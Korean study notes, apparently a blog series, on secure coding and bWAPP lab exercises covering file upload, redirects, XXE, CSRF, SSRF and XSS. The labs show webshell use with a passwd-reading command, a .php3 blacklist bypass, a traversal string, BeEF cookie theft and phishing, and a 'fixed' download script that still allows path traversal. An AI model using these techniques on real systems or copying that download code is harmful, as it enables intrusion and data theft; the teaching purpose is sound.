Django 에서 mark_safe를 사용하면 Django 에서 HTML 특수문자로 치환하는 기능을 제거하고 사용할 수 있다. 그래서 mark_safe를 사용할 때는 주의가 필요하고 신뢰할 수 없는 데이터에 대해서는 사용하지 않는 것이 안전하다.

autoescape off도 비슷한 기능을 하는 데 사용할 경우 주의가 필요하고 신뢰할 수 없는 값에 대해서는 on으로 설정하는 것이 안전하다. autoescape의 기본값은 on이다.

5) 운영체제 명령어 삽입

외부 입력값이 운영체제 명령어 실행 또는 명령어 일부로 사용되는 경우

OS Command Injection 때 공부한 내용이다.

적절한 검증, 제한을 거치지 않은 사용자 입력값이 운영체제 명령어에 사용되는 경우 시스템 동작 및 운영에 악영향을 미칠 수 있다.

(1) 안전한 코딩기법

외부 입력값에 시스템 명령어를 포함하는 경우 |, ;, &, :, >, <, \ 과같이 멀티 라인 및 리다이렉트 문자 등을 필터링하고 명령을 수행할 파일명과 옵션을 제한해 인자로만 사용될 수 있도록 해야 한다.

os.system은 외부로부터 받은 입력값을 통해 프로그램을 실행하며, 외부에서 전달되는 인자값은 명령어의 생성에 사용된다. 이때 실행할 프로그램을 제한하지 않고 사용하면 공격자는 원하는 모든 프로그램을 실행할 수 있다. 

외부에서 입력받은 각이 명령어 인자로 사용되지 않고 명령어 그 자체로 사용될 경우에는 사전에 화이트리스트 배열을 정의한 후 적절한 파라미터를 선택하도록 해야 한다.

6) 위험한 형식 파일 업로드

업로드되는 파일의 크기와 개수를 제한하지 않고 외부에서 접근할 수 있는 경로에 저장했을 때 발생

서버에서 실행할 수 있는 스크립트 파일을 업로드하고, 그 파일을 직접 호출해서 실행한다.

파일에 새로운 보안 약점을 넣어 둔다면, 파일이 실행되면서 서버에 새로운 보안 약점이 생기게 된다.

대표적으로 운영체제 명령어 삽입 공격을 쉽게 할 수 있도록 하는 웹쉘이 있다.

(1) 안전한 코딩기법

파일 업로드 공격을 방지하기 위해서 특정 파일 유형만 허용하도록 화이트리스트 방식으로 파일 유형을 제한해야 한다.

파일 크기 및 파일 개수를 제한하지 않으면 시스템 자원 고갈이 되어 서비스 거부가 발생하는데, 이 서비스 거부 공격이 발생하지 않도록 제한해야 한다.

업로드 파일을 웹 루트 폴더 외부에 저장해 공격자가 URL을 통해 파일을 실행할 수 없도록 해야 하며, 가능하면 업로드된 파일의 이름은 공격자가 추측할 수 없는 무작위한 이름으로 변경 후 저장하는 것이 안전하다.

7) 신뢰되지 않은 URL 주소로 자동 접속 연결

Redirection

리다이렉션 기능이 존재하는 경우, 외부 입력값을 검증, 제한 없이 리다이렉션의 주소로 사용되는 경우 발생한다.

요청한 주소에 리다이렉션 주소로 사용되는 경우가 많은데, 리다이렉션 주소를 검증, 제한하지 않는 경우 공격자가 요청한 해당 주소 사이트와 동일하게 만들어 놓은 사이트로 이동하게 된다. 공격자는 리다이렉션이 들어 있는 주소를 클릭할 수 있게 링크로 만들어 이메일, SMS, 카톡 등을 통해서 불특정 다수에게 전달해 피싱 공격에 악용한다.

(1) 리다이렉트 방법

• HTTP 리다이렉션
  • 300번대 상태코드와 Location 응답헤더를 전달해서 클라이언트(브라우저)가 다시 요청
•  HTML 리다이렉션
  • ```html```
•  JavaScript 리다이렉션
  • ```html```
•  적용 우선순위
  1. HTTP 리다이렉션
  2. HTML 리다이렉션
  3. JavaScript 리다이렉션

(2) 안전한 코딩기법

리다이렉션을 허용하는 모든 URL을 서버 측 화이트리스트로 관리하고 사용자 입력값을 리다이렉션 할 URL이 존재하는지 검증해야 한다.

만약 리다이렉션 URL의 인자 값으로 사용되어야만 하는 경우 모든 리다이렉션에서 프로토콜과 host 정보가 들어가지 않는 상대 URL(relative)을 사용 및 검증해야 한다. 절대  URL(absoute  URL)을 사용할 경우 리다이렉션을 실행하기 전에 사용자 입력 URL이 서비스하고 있는 URL로 시작하는지를 확인해야 한다.

8) 부적절한 XML 외부 개체 참조

서버에서 XML 외부 엔티티를 처리할 수 있도록 설정된 경우에 발생

XML 문서에는 DTD(Document Type Definition)를 포함할 수 있으며 DTD는 XML 엔티티(entity)를 정의한다.

취약한 XML parser가 외부값을 참조하는 XML을 처리할 때 공격자가 삽입한 공격 구문이 동작하여 서버 파일 접근, 불필요한 자원 사용, 인증 우회, 정보 노출 등이 발생할 수 있다.

파이썬에서 기본 XML 파서가 제공되는데, 이 파서는 유효성 검사와 같은 고급 기능은 지원하지 않는다. 그렇기 때문에 안정성이 검증된 다른 라이브러리를 사용하는 것이 안전하다.

(1) 안전한 코딩기법

로컬 정적 DTD를 사용하도록 설정하고 외부에서 전송된 XML 문서에 포함된 DTD를 완전하게 비활성화해야 한다. 비활성화를 할 수 없는 경우에는 외부 엔티티 및 외부 문서 유형 선언을 각 파서에 맞는 고유한 방식으로 비활성화한다.

외부 라이브러리를 사용할 경우 기본적으로 외부 엔티티에 대한 구문 분석 기능을 제공하는지 확인하고 제공이 되는 경우 해당 기능을 비활성화할 방법을 확인해 외부 엔티티 구문 분석 기능을 비활성화한다.

9) XML 삽입

외부 입력값에 XPath 구문 또는 XQuery 구문을 조작할 수 있는 문자열 포함 여부를 확인하지 않고 XML 문서를 해석해서 실행하는 데 사용하는 경우에 발생

공격자가 쿼리문의 구조를 임의로 변경하고 쿼리를 실행해 허가되지 않은 데이터를 열람하거나 인증 절차를 우회할 수 있는 보안 약점이다.

(1) 안전한 코딩기법

XQuery 또는 XPath 쿼리에 사용되는 외부 입력값에 대하여 특수문자 및 쿼리 예약어를 필터링하고 인자화된 쿼리문을 지원하는 XQuery를 사용해야 한다.

10) LDAP 삽입

LDAP 서버에 조회를 요청할 때 입력값이 사용되는 것

외부 입력값을 적절할 처리 없이 LDAP 쿼리문이나 결과의 일부로 사용하는 경우 LDAP 쿼리문이 실행될 때 공격자는 LDAP 쿼리문의 내용을 마음대로 변경할 수 있다.

(1) LDPA 서버

LDAP은 사용자가 조직, 구성원 등에 대한 데이터를 찾는 데 도움이 되는 프로토콜이다.

LDAP 서버는 디렉터리 서비스로 우리가 가지고 있는 리소스들을 계층 구조로 관리해 주는 서버다.

(2) 안전한 코딩기법

• 올바른 인코딩 함수를 사용해 모든 변수 이스케이프 처리
• 화이트리스트 방식의 입력값 유효성 검사
• 사용자 패스워드와 같은 민감한 정보가 포함된 필드 인덱싱
• LDAP 바인딩 계정에 할당된 권한 최소화

사용자의 입력을 그대로 LDAP 질의문에 사용하면 권한 상승 등의 공격에 노출될 수 있다. 사용자의 입력 중 LDAP 질의문에 사용될 변수를 이스케이프 하여 질의문 실행 시 공격에 노출되는 것을 예방해야 한다.

11) 크로스사이트 요청 위조(CSRF)

공격자가 심어 놓은 자동화된 요청이 서버에서 희생자의 권한으로 실행되는 것

웹 응용프로그램이 사용자로부터 받은 요청이 해당 사용자가 의도한 대로 작성되고 전송된 것인지 확인하지 않는 경우 발생한다. 공격자는 사용자가 인증한 세션이 특정 동작을 수행해도 계속 유지되어 정상적인 요청과 비정상적인 요청을 구분하지 못하는 점을 악용한다.

정상적인 페이지로부터의 요청인지, 공격자가 작성한 자동화된 요청인지를 확인하지 않고 요청을 처리하고, 주요 기능임에도 불구하고 인증 여부 및 요청 처리에 필요한 값 전달 여부만 확인하고 사용자가 요청한 것인지 자동화된 코드가 요청한 것인지 확인하지 않고 요청을 처리하는 문제가 있다.

(1) 안전한 코딩기법

해당 요청이 정상적인 사용자의 정상적인 절차에 의한 요청인지를 구분하기 위해 세션별로 CSRF 토큰을 생성하여 세션에 저장하고 사용자가 작업 페이지를 요청할 때마다 hidden 값으로 클라이언트에게 토큰을 전달한 뒤, 해당 클라이언트의 데이터 처리 요청 시 전달되는 CSRF 토큰값을 체크하여 요청의 유효성을 검사하도록 한다.

1. 요청 절차 검증
   • 텍스트 기반의 토큰을 이용해 요청 절차 검증
     • 토큰 전달 과정에 사용자가 관여하지 않고 공격자가 토큰이 있는 페이지를 먼저 호출해 토큰을 추출한 후 다음 페이지를 호출하는 방식으로 공격이 가능
   • CAPTCHA
   • reCAPTCHA
2. 주요 기능에 요청 주체를 확인하고 재인증, 재인가 후 처리

12) 서버사이드 요청 위조

서버 내부에서 다른 서버로의 요청 결과를 사용하는 경우, 서버 내부 요청에서 사용할 서버 주소를 외부에서 받아오는 경우, 그 주소를 검증, 제한하지 않으면 의도하지 않은 서버로 전달되어 의도하지 않은 결과 반환

CSRF와 서버사이드 요청 위조는 헷갈릴 수 있다.

CSRF는 클라이언트에서 서버로 요청하면 서버는 처리해서 반환한다. 이때 요청 절차와 검증을 하지 않고 반환하고, 요청은 사람이 하는 것이 아니고 어떤 스크립트와 같은 것을 이용해 자동으로 요청이 발생한다.

서버사이드 요청 위조는 서버 안의 로직에 다른 쪽으로 요청해서 요청의 결과를 받아와서 그 결과를 클라이언트에게 전달하는 것이다. 클라이언트가 서버에 페이지를 요청했는데, 이 서버가 페이지 처리를 다른 서버로 요청해서 결과를 받아와 그 결과와 조합해서 보내는 것이다.

이때 클라이언트에서 전달된 어떠한 값을 이용해서 다른 서버로 요청을 보내는 것인데, 클라이언트에서 전달된 어떠한 값이 변경되면 원래 가야 하는 서버가 아닌 또 다른 서버로 이동해 처리 후 결과를 반환할 수 있게 된다.

(1) 안전한 코딩기법

사용자의 입력값을 화이트리스트 방식으로 필터링한다. 부득이하게 사용자가 지정하는 무작위의 URL 받아들여야 하는 경우라면 내부 URL을 블랙리스트로 지정하여 필터링한다. 동일한 내부 네트워크에 있더라도 기기 인증, 접근권한을 확인하여 요청이 이루어질 수 있도록 한다.

13) HTTP 응답 분할

외부 입력값에 개행문자 포함 여부를 확인하지 않고 응답 헤더의 각으로 사용되는 경우 응답이 분리되어 전달되는 현상

새롭게 추가된 응답 본문에 악성 코드를 삽입하여 전달하는 것이 가능해진다.

외부 입력값에 개행문자가 존재하면 HTTP 응답이 2개 이상으로 분리될 수 있다. 이 경우 공격자는 개행문자를 이용해 첫 번째 응답을 종료시키고 두 번째 응답에 악의적인 코드를 주입해 XSS 및 캐시 훼손 공격 등을 할 수 있다.

요청 헤더가 시작하고 개행문자가 두 번 연속해서 나오면 요청 헤더의 끝을 알 수 있다. 응답 헤더의 끝도 개행문자가 두 번 연속으로 나오는 것으로 끝으로 한다.

(1) 안전한 코딩기법

외부 입력값이 헤더, 쿠키, 로그 등에 사용될 경우에는 항상 개행문자를 검증하고 가능하다면 헤더에 사용되는 예약어 등을 화이트리스트로 제한해야 한다.

응답 분할을 예방하기 위해 \r, \n과 같은 문자에 대해 치환 또는 예외 처리를 적용해 응답 분할이 발생하지 않도록 해야 한다.

14) 정수형 오버플로우

정수형 크기가 고정된 상태에서 변수가 저장할 수 있는 범위를 넘어선 값을 저장할 때 발생

정수를 이진수로 처리할 때 제일 앞자리는 부호비트로 가진다. 이때 양수가 증가하는데, 부호비트를 제외한 나머지가 가득 차면 가장 큰 정수가 돼서 더 이상 증가할 곳이 없음에도 불구하고 양의 정수가 더 증가하면 부호비트를 침범해서 부호비트가 변경되고 사용하고 있는 수는 음수로 변해 가장 작은 정수가 되어 버리는 현상이 나타나는데 이를 정수형 오버플로우라고 한다.

반대로 음수에서 정수가 되면 언더플로우가 됐다고 한다.

(1) 안전한 코딩기법

기본 파이썬 자료형을 사용하지 않고 패키지에서 제공하는 데이터 타입을 사용할 경우 해당 패키지에서 제공하는 데이터 타입의 표현 방식과 최대 크기를 반드시 확인해야 한다.

변수에 값 할당 전에 반드시 변수의 최소 및 최댓값을 확인하고 범위를 넘어서는 값을 할당하지 않는지 테스트해야 한다.

15) 보안 기능 결정에 사용되는 부적절한 입력값

안전한 처리를 위해서는 외부 사용자 입력을 최소화하고, 믿을 수 있는 시스템 내부의 값을 사용하도록 설계하고 구현해야 함

외부 입력값에 대해 신뢰하게 되면, 공격자는 입력값을 조작해 보호 메커니즘을 우회할 수 있게 된다.

인증이나 인가와 같은 보안 결정이 쿠키, 환경변수, 히든 필드 등에 기반을 두어 수행되는 경우 공격자는 입력값을 조작해 보안을 우회할 수 있다. 따라서 충분한 암호화, 무결성 체크를 수행하고 이와 같은 메커니즘이 없는 경우엔 외부 사용자에 의한 입력값을 신뢰해서는 안 된다.

(1) 안전한 코딩기법

상태 정보나 민감한 데이터 특히 사용자 세션 정보와 같은 중요 정보는 서버에 저장하고 보안 확인 절차도 서버에서 실행한다.

16) 포맷 스트링 삽입

포맷 문자열을 지원하는 함수를 사용할 때, 외부 입력값에 포맷 문자열 포함 여부를 확인하지 않고 포맷 문자열 생성에 사용하는 경우 발생

공격자는 포맷 문자열을 이용해 취약한 프로세스를 공격하거나 메모리 내용을 읽고 쓸 수 있다. 이를 통해 취약한 프로세스의 권한을 취득해 임의의 코드를 실행할 수 있다.

공격자는 포맷 문자열을 이용해 내부 정보를 문자열로 만들 수 있고, 이를 그대로 사용하는 경우 중요 정보 유출로 이어질 수 있다.

(1) 안전한 코딩기법

포맷 문자열을 처리하는 함수 사용 시 사용자 입력값을 직접적으로 포맷 문자열로 사용하거나 포맷 문자열 생성에 포함하지 않아야 한다. 사용자로부터 입력받은 데이터를 포맷 문자열로 사용하고자 하는 경우에는 서식 지정자를 포함하지 않거나 파이썬의 내장함수 또는 내장 변수 등이 포함되지 않도록 해야 한다.

파일 업로드 기능이 제공되는 경우, 파일의 크기와 개수, 종류들 제한하지 않고, 외부에서 접근할 수 있는 경로에 업로드 파일을 저장하는 경우 발생

1) 가이드

• 파일 크기와 개수를 제한하지 않는 경우
  • 서버의 연결 및 디스크 자원을 고갈시켜 정상적인 서비스를 방해
• 종류를 제한하지 않는 경우
  • 바이러스와 같은 파일을 업로드해서 해당 서버를 악성코드 유포지로 활용
  • 서버에서 실행할 수 있는 파일을 업로드해서 실행
  • 웹쉘(WebShell)
• 외부에서 접근할 수 있는 경로에 업로드 파일을 저장하는 경우
  • URL을 통해서 접근할 수 있는 경로에 위치
  • Web Document Root 아래에 위치

2) 파일 업로드 기능 확인 방법

form 태그 설명

<form enctype="multipart/form-data"    method="post" ... > 
    <input type="file" ... >
</form>

위 코드가 파일 업로드에 사용되는 코드다. 

input type에 파일이 들어가면 enctype에는 multipart/form-data가 들어가게 되어 있다.

3) 방어 기법

1. 업로드 파일의 크기와 개수를 제한
   • 설계 시 제공하는 서비스에 맞는 적절한 크기와 개수를 정의하는 것이 필요
2. 파일의 종류를 제한
   • 업로드 가능한 파일의 종류를 미리 정의하고 정의된 범위 내에서만 업로드 허용
   • 화이트 리스트(허용 목록) 방식으로 제한
   • 파일 종류를 비교하는 방법
     • 확장자 - 파일명이 어떻게 끝나는가로 판단
     • Content--Type
     • File Signature - Magic Number
3. 업로드 파일을 외부에서 접근할 수 없는 경로에 저장
   • Web Root(document) 밖
4. 업로드 파일의 이름을 외부에서 알 수 없는 형태로 변경해서 알 수 없는 경로에 저장
5. 업로드 파일의 실행 속성을 제거하고 저장

2. 이미지 업로드 실습

1) 이미지 업로드

here에 마우스를 올리면 위와 같은 주소가 나온다. 이 주소는 외부에서 접근할 수 있는 경로에 업로드 파일명과 동일한 이름으로 저장하고 있는 것을 볼 수 있다.

이 페이지는 php로 만들어진 페이지로 동작하고 있는데 이때 서버에서 실행할 수 있는 파일을 업로드 해본다.

2) 실행할 수 있는 파일 업로드

PHP로 만들어진 웹쉘 업로드

PHP로 만들어진 웹쉘은 kali에서 제공하는데 /usr/share/webshells/php 경로에 simple-backdoor.php 파일이다.

이 파일을 업로드 페이지에 업로드 하게되면 위와 같이 경로 주소가 나오게 된다.

위에 나온 주소로 이동하게 되면 주소 뒤에 ?cmd=cat /cat/passwd를 넣으라는 사용법이 나온다. 사용법에 따라 주소를 추가로 넣게 되면 passwd의 내용이 나오는 것을 볼 수 있다.

3) 취약한 소스 코드 확인

 sudo gedit /var/www/bWAPP/unrestricted_file_upload.php

코드가 길어 내용이 길어지기 때문에 코드를 간략하게 본다. 위 파일에 들어가면 코드 원본이 있으므로 참고한다.

switch($_COOKIE["security_level"])
    {
        case "0" :                     
            move_uploaded_file($_FILES["file"]["tmp_name"], "images/" . $_FILES["file"]["name"]);
            break;
    }

이 코드는 업로드 파일을 현재 디렉터리의 images 아래에 업로드 파일명으로 저장하는 코드다. 

그렇기 때문에 위 실습에서 외부에서 접근할 수 있는 주소로 나오게 된 것이다.

(1) 보안 등급이 중간인 경우

file_upload_check_1 함수

function file_upload_check_1($file, $file_extensions = array("asp", "aspx", "dll", "exe", "jsp", "php"), $directory = "images")                                       
{
    $file_array = explode(".", $file["name"]);                

    // Puts the last part of the array (= the file extension) in a new variabele
    // Converts the characters to lower case
    $file_extension = strtolower($file_array[count($file_array) - 1]);    

    // Searches if the file extension exists in the 'allowed' file extensions array   
    if(in_array($file_extension, $file_extensions))            
    {
       $file_error = "Sorry, the file extension is not allowed. The following extensions are blocked: <b>" . join(", ", $file_extensions) . "</b>";

       return $file_error;
    }

    // Checks if the file already exists in the directory
    if(is_file("$directory/" . $file["name"]))                
    {
        $file_error = "Sorry, the file already exists. Please rename the file...";      
    }

    return $file_error;
}

file_upload_check_1 함수 코드인데, 중간에 많은 내용이 생략되었고 필요한 부분만 잘라서 가져온 것이기 때문에, 파일에 있는 함수를 참고하기를 바란다.

file_extensions로 허용되지 않는(블랙 리스트) 파일 확장자를 정의하고 있다. 

• file_array = explode
  • 확장자 검증을 위해서 .을 기준으로 분리
• file_extension = ...
  • 확장자를 소문자로 변환
• if(in_array(...))
  • 제한 목록에 포함된 경우 오류 처리
• if(is_file(...))
  • 동일한 파일이 존재하는지 검증

(2) 확장자 변경

위 코드를 확인했을 때 블랙 리스트로 정의가 되어 있었다. 블랙 리스트에는 PHP3가 정의되어 있지 않기 때문에 PHP3로 확장자를 변경해서 업로드 해볼 수 있다.

보안 등급을 중간으로 올린 후 업로드 페이지로 들어간다.

보안 등급이 중간단계인 경우 php 파일을 업로드 하려고 하면 블랙 리스트에 정의 되어 있어 오류가 발생한다.

그러나 위에서 말했듯이 확장자를 php3으로 바꿔 업로드 하면 업로드가 되는 것을 볼 수 있다.

블랙 리스트로 정의했을 때 발생할 수 있는 보안 사고를 보여주는 예제이다.

(3) 보안 등급이 가장 높은 경우

function file_upload_check_2($file, $file_extensions = array("jpeg", "jpg", "png", "gif"), $directory = "images")
{        

    // Searches if the file extension exists in the 'allowed' file extensions array   
    if(!in_array($file_extension, $file_extensions))    
    {
       $file_error = "Sorry, the file extension is not allowed. Only the following extensions are allowed: <b>" . join(", ", $file_extensions) . "</b>";

       return $file_error;
    }

이 코드도 많은 생략이 되었으므로 파일에서 코드를 찾아보기 바란다.

• file_extensions
  • 화이트 리스트 방식으로 확장자 체한
• if(!in_array(...))
  • 화이트 리스트에 포함되지 않은 확장자인 경우 오류 처리

4) 웹 루트 밖 저장

업로드 파일이 /data/images/myimage.gif 형태로 저장되어 있다고 가정한다.

이때 data 앞에 있는 / 이 디렉터리는 해당 서버의 루트 디렉터리를 의미한다.

그렇다면 아래와 같이 접근이 불가다.

<img src="/data/images/myimage.gif">

<a href="/data/images/myimage.gif" >

왜냐하면 위 코드의 data 앞에 있는 / 이 디렉터리는 웹 루트 디렉터리를 의미하기 때문이다. 

업로드 파일에 접근하려면 다운로드 기능을 추가해야 한다.

<img src="download?file=/data/images/myimage.gif">

<a href="download?file=/data/images/myimage.gif">

위 코드처럼 두 가지의 방법을 사용할 수 있다. download는 요청 파라미터로 전달된 경로의 파일을 읽어서 응답으로 반환한다. 이때 되도록 업로드 파일이 저장된 경로는 외부에 노출되지 않는 것이 안전하다.

<img src="download?file=myimage.gif">

<a href="download?file=myimage.gif">

여기서 download는 요청 파라미터로 전달된 파일을 해당 서버의 /data/images 디렉터리에서 읽어서 응답으로 반환한다.

경로는 서버 내부에 숨겨 놓고 파일명만 받는 것이 안전하다.

(1) 다운로드 기능 유의 사항

• 지정된 경로를 벗어나서 파일을 읽지 못하도록 제한
  • 경로 조작 취약점(path traversal)에 노출

download?file=myimage.gif 로 만들면 좋다고 했다. 하지만 서버 내부에서 file의 경로를 검증하지 않고 그냥 사용하면 지정된 경로를 조작할 수 있는 문자열을 넣을 수 있게 된다.

download?file=../../../../etc/passwd 로 상위 디렉터리로 이동할 수 있는 명령어를 사용해서 루트 디렉터리로 이동해 시스템 파일에 접근할 수 있게 된다. 

(2) 취약한 코드 수정

        case "2" :            

            $file_error = file_upload_check_2($_FILES["file"], array("jpg","png"));

            if(!$file_error)
            {

                move_uploaded_file($_FILES["file"]["tmp_name"], "/data/images/" . $_FILES["file"]["name"]);
                // 외부에서 접근할 수 없는 경로에 파일을 저장하도록 수정
            }            

            break;

if(isset($_POST["form"]))
    {

        if(!$file_error)
        {
            echo "The image has been uploaded <a href=\"/data/images/" . $_FILES["file"]["name"] . "\" target=\"_blank\">here</a>.";

        echo "<img src=\"/data/images/" . $_FILES["file"]["name"] . "\">";
        }    //  업로드된 파일에 대한 링크(<a>)와 출력(<img>)을 저장된 경로로 수정 
        //  주소를 통해서 접근할 수 없으므로 링크도 출력도 되지 않음

(3) Bee box 가상머신에 파일 저장을 위한 디렉터리 생성

sudo mkdir -p /data/images
ls /data/images
sudo chown root:www-data /data/images
sudo chmod 777 /data/images

(4) Kali에서 이미지 업로드

웹 루트 디렉터리 아래에 존재하지 않는 디렉터리와 파일을 참조하므로 링크도 동작하지 않고 이미지도 나타나지 않는다.

(5) 다운로드 기능 추가

sudo gedit /var/www/bWAPP/download.php

<?php
  $target_Dir = "/data/images/";
  $file = $_GET['file'];
  $down = $target_Dir.$file;
  $filesize = filesize($down);

  if(file_exists($down)){
    header("Content-Type:application/octet-stream");
    header("Content-Disposition:attachment;filename=$file");
    header("Content-Transfer-Encoding:binary");
    header("Content-Length:".filesize($target_Dir.$file));
    header("Cache-Control:cache,must-revalidate");
    header("Pragma:no-cache");
    header("Expires:0");
    if(is_file($down)){
        $fp = fopen($down,"r");
        while(!feof($fp)){
          $buf = fread($fp,8096);
          $read = strlen($buf);
          print($buf);
          flush();
        }
        fclose($fp);
    }
  } else{
    ?><script>alert("존재하지 않는 파일입니다.")</script><?
  }
?>

(6) 링크와 이미지 출력 반영

    if(isset($_POST["form"]))
    {

        if(!$file_error)
        {

/*
            echo "The image has been uploaded <a href=\"/data/images/" . $_FILES["file"]["name"] . "\" target=\"_blank\">here</a>.";

        echo "<img src=\"/data/images/" . $_FILES["file"]["name"] . "\">";
*/
            echo "The image has been uploaded <a href=\"download.php?file=" . $_FILES["file"]["name"] . "\" target=\"_blank\">here</a>.";

        echo "<img src=\"download.php?file=" . $_FILES["file"]["name"] . "\">";


        }

        else
        {

            echo "<font color=\"red\">" . $file_error . "</font>";        

        }

    }

이미지와 링크가 출력되는 것을 볼 수 있다.

1) 설치 및 실행

(1) 설치

sudo apt install beef-xss 입력으로 설치

(2) 실행

sudo beef-xss 입력 실행

처음 실행하면 기본 비밀번호 재 설정을 해야 한다. 각자의 비밀번호를 입력하고 넘어가면 127.0.0.1:3000 주소로 BeEF 페이지가 열린다. ID에는 beef를 입력하고 각자가 설정한 비밀번호를 입력하고 로그인한다.

2) XSS 공격

(1) XSS - Stored(Blog)

이전 포스팅에서 스크립트로 공격했던 페이지에서 BeEF로 공격 실습한다.

(2) hook.js

Kali 가상머신에서 XSS 취약점을 가지고 있는 게시판에 hook.js 파일을 실행하는 글을 등록한다.

(3) BeEF 확인

BeEF 콘솔에서 스크립트 코드가 실행된 것을 확인할 수 있다.

위 bee.box에 나온 IP 주소는 Kali 가상머신의 주소다.

(4) 호스트 PC

호스트 PC에서 XSS에 위 게시글이 저장된 페이지를 접속해서 hook.js가 계속해서 호출하는 것을 확인한다.

(5) BeEF 확인

BeEF 콘솔을 다시 확인하면 호스트 PC가 감염된 것을 볼 수 있고, 감염된 브라우저 정보를 확인할 수 있다.

정보 위에 있는 탭 중 Commands를 들어가면 더 많은 정보를 얻을 수 있다.

쿠키

Get Cookie를 누르면 오른쪽 칸 아래에 Execute 버튼이 있는데, 버튼을 누르면 쿠키를 얻기 위해 스크립트를 만들지 않아도 쿠키 정보를 얻을 수 있다.

쿠키 정보만 얻을 수 있는 것은 아니고, Module Tree를 확인해 보면 많은 정보를 얻을 수 있다.

• Get Page HTML - HTML 소스 코드 정보
• Get Page HREFs - 링크 정보
• Play Sound - 사운드 파일의 링크를 입력하면 브라우저에서 소리가 난다.
• Redirect Browser - 입력한 주소로 리다이렉션

Fake Flash Update

호스트 PC에서 이상한 업데이트 창이 나오게 되는데 많은 사람은 위 설명을 자세히 읽지 않고 설치하게 된다.

Google Phishing

Execute 하면 구글 로그인 페이지가 나오게 된다. 구글은 익숙하고 신뢰 있는 사이트로 생각하기 때문에 많은 사람들은 가짜 페이지에 대해 의심 없이 로그인하게 된다. 

로그인하게 되면 BeEF 콘솔에 정보가 나오게 된다.

가짜 페이지에서 로그인 시도를 하면 로그인 시도가 잘못되었다는 로그인 실패 메시지를 몇 번 보여주고 원래 구글 페이지로 리다이렉션을 한다. 그렇게 되면 사용자는 진짜 구글 페이지에서 로그인하고 로그인이 되어 의심을 하지 않는다.

하지만 몇 번의 입력한 값들은 공격자가 이미 빼돌리게 된다.

3) 취약한 소스 코드 확인

sudo gedit /var/www/bWAPP/xss_stored_1.php
functions_external.php

//xss_stored_1.php

while($row = $recordset->fetch_object())
{

    if($_COOKIE["security_level"] == "2")
    {
?>
        <tr height="40">
            <td align="center"><?php echo $row->id; ?></td>
            <td><?php echo $row->owner; ?></td>
            <td><?php echo $row->date; ?></td>
            <td><?php echo xss_check_3($row->entry); ?></td>     
        </tr>
<?php
    }
    else
        if($_COOKIE["security_level"] == "1")
        {
?>
        <tr height="40">
            <td align="center"><?php echo $row->id; ?></td>
            <td><?php echo $row->owner; ?></td>
            <td><?php echo $row->date; ?></td>
            <td><?php echo xss_check_4($row->entry); ?></td>     
        </tr>
<?php
        }
        else        
            {
?>
        <tr height="40">
            <td align="center"><?php echo $row->id; ?></td>
            <td><?php echo $row->owner; ?></td>
            <td><?php echo $row->date; ?></td>
            <td><?php echo $row->entry; ?></td>             
        </tr>                                   
<?php          
            }
}      


// functions_external.php

function xss_check_3($data, $encoding = "UTF-8")
{
    // htmlspecialchars - converts special characters to HTML entities    
    // '&' (ampersand) becomes '&amp;' 
    // '"' (double quote) becomes '&quot;' when ENT_NOQUOTES is not set
    // "'" (single quote) becomes '&#039;' (or &apos;) only when ENT_QUOTES is set
    // '<' (less than) becomes '&lt;'
    // '>' (greater than) becomes '&gt;'          
    return htmlspecialchars($data, ENT_QUOTES, $encoding);
}

function xss_check_4($data)
{
    // addslashes-returns a string with backslashes before characters that need to be quoted in database queries etc.
    // These characters are single quote ('), double quote ("), backslash (\) and NUL (the NULL byte).
    // Do NOT use this for XSS or HTML validations!!!

    return addslashes($data);
}

• 보안 등급이 높은 경우
  • xss_check_3 함수 호출
  • <script> 태그가 & lt; script & gt; 형태로 변경되어 전달
  • & lt; script & gt; 형태를 브라우저는 <script> 텍스트로 단순 출력
• 보안 등급이 중간인 경우
  • xss_check_4 함수 호출
  • addslashes 함수
  • 작은따옴표, 큰따옴표, 백슬래시, NUL에 대해 이스케이프
• 보안 등급이 가장 낮은 경우
  • DB에 저장된 내용을 그대로 출력

2. Django 에서 XSS

1) 질문에 스크립트 코드 포함 저장

2) 저장된 질문 확인

(1) 질문 페이지 확인

스크립트 코드가 실행되지 않고 단순한 문자열로 출력된다. 페이지 소스 코드는 어떻게 되어 있는지 확인해 본다.

(2) 페이지 소스 코드

소스 코드에서 보면 스크립트 코드가 HTML 인코딩되어 단순한 문자열로 출력되는 것을 확인할 수 있다.

(3) DB 확인

DB에는 스크립트 코드가 들어있는 것을 확인할 수 있다.

(4) 코드 확인

DB에 저장된 내용을 XSS 공역에 안전하도록 출력해 주는 부분이다. DTL에서 실행할 수 있는 코드를 안전하게 HTML 인코딩해서 출력해 준다.

(5) 태그 동작

위와 같이 등록했는데 태그가 동작하지 않는다. 그런데 DB에 있는 내용을 그대로 출력해야 할 경우도 있다.

특정 부분에 HTML 태그가 동작하도록 하려면 autoescape off 설정을 추가해 주어야 한다.

autoescape off

 autoescape off 설정을 한 후 답변을 보면 태그가 작동하는 것을 볼 수 있다.

태그가 작동하는 것을 확인했다면, 스크립트 코드가 작동하는 것이므로 쿠키값을 얻을 수 있다.

safe 필터

autoescape off 설정과 같은 기능을 한다.

mark_safe 함수

• pybo\views.py 수정

def detail(request, question_id): 
    # question = Question.objects.get(id=question_id)
    question = get_object_or_404(Question, pk=question_id)
    msg = "<script> alert('xss') </script>"

    context = { 'question': question, 'msg': msg }

    return render(request, 'pybo/question_detail.html', context)

실행 가능한 스크립트 코드를 템플릿으로 전달하는 코드를 추가한다.

• templates\pybo\question_detali.html 수정

<h5 class="border-bottom my-3 py-2">
        {{ question.answer_set.count }}개의 답변이 있습니다. ({{ msg }})
</h5>

전달된 msg를 출력하는 코드를 추가한다.

• 확인

DTL에 의해서 태그가 HTML 인코딩되어 단순 문자열로 출력된다.

이 스크립트를 이스케이프 처리 하지 않도록 지정할 수 있다.

• pybo\views.py 수정

from django.shortcuts import render, get_object_or_404, redirect
from .models import Question
from .forms import QuestionForm
from django.utils import timezone
import subprocess
from django.utils.safestring import mark_safe    # 추가

def index(request):
    question_list = Question.objects.order_by('-create_date')
    context = { 'question_list': question_list }

    return render(request, 'pybo/question_list.html', context)


def detail(request, question_id): 
    # question = Question.objects.get(id=question_id)
    question = get_object_or_404(Question, pk=question_id)
    msg = "<script> alert('xss') </script>"
    msg = mark_safe(msg)    # mark_safe 함수 추가

    context = { 'question': question, 'msg': msg }

    return render(request, 'pybo/question_detail.html', context)

• 확인

스크립트 코드가 실행되는 것을 확인할 수 있다.

• 결론

Django에서는 DTL이 HTML 엔티티를 자동으로 HTML 인코딩 처리하여 단순 문자열로 출력되도록 하고 있으나, 

